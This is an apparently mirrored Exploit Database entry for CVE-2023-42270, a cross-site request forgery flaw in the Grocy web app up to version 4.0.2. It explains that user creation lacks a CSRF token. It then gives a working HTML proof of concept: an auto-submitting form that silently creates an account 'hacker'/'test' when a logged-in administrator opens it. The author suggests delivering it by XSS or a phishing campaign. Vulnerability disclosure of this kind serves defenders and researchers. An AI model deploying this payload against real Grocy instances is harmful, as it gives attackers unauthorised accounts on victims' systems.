Grocy <=4.0.2 - CSRF

• Exploit Database
• 19 阅读

• 作者： Chance Proctor
  日期： 2024-01-31
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51760/

• # Exploit Title: Grocy <= 4.0.2 CSRF Vulnerability
  # Application: Grocy
  # Version: <= 4.0.2
  # Date: 09/21/2023
  # Exploit Author: Chance Proctor
  # Vendor Homepage: https://grocy.info/
  # Software Link: https://github.com/grocy/grocy
  # Tested on: Linux
  # CVE : CVE-2023-42270
  
  
  
  Overview
  ==================================================
  When creating a new user in Grocy 4.0.2, the new user request is made using JSON formatting.
  This makes it easy to adjust your request since it is a known format. 
  There is also no CSRF Token or other methods of verification in place to verify where the request is coming from.
  This allows for html code to generate a new user as long as the target is logged in and has Create User Permissions.
  
  
  
  Proof of Concept
  ==================================================
  Host the following html code via a XSS or delivery via a phishing campaign:
  
  	<html>
  	<form action="/api/users" method="post" enctype="application/x-www-form-urlencoded">
  	<input name='username' value='hacker' type='hidden'>
  	<input name='password' value='test' type='hidden'>
  	<input type=submit>
  	</form>
  	<script>
  	history.pushState('','', '/');
  	document.forms[0].submit();
  	</script>
  	</html>
  
  
  If a user is logged into the Grocy Webapp at time of execution, a new user will be created in the app with the following credentials
  
  	Username: hacker
  	Password: test
  
  Note:
  In order for this to work, the target must have Create User Permissions.
  This is enabled by default.
  
  
  
  Proof of Exploit/Reproduce
  ==================================================
  http://xploit.sh/posts/cve-2023-42270/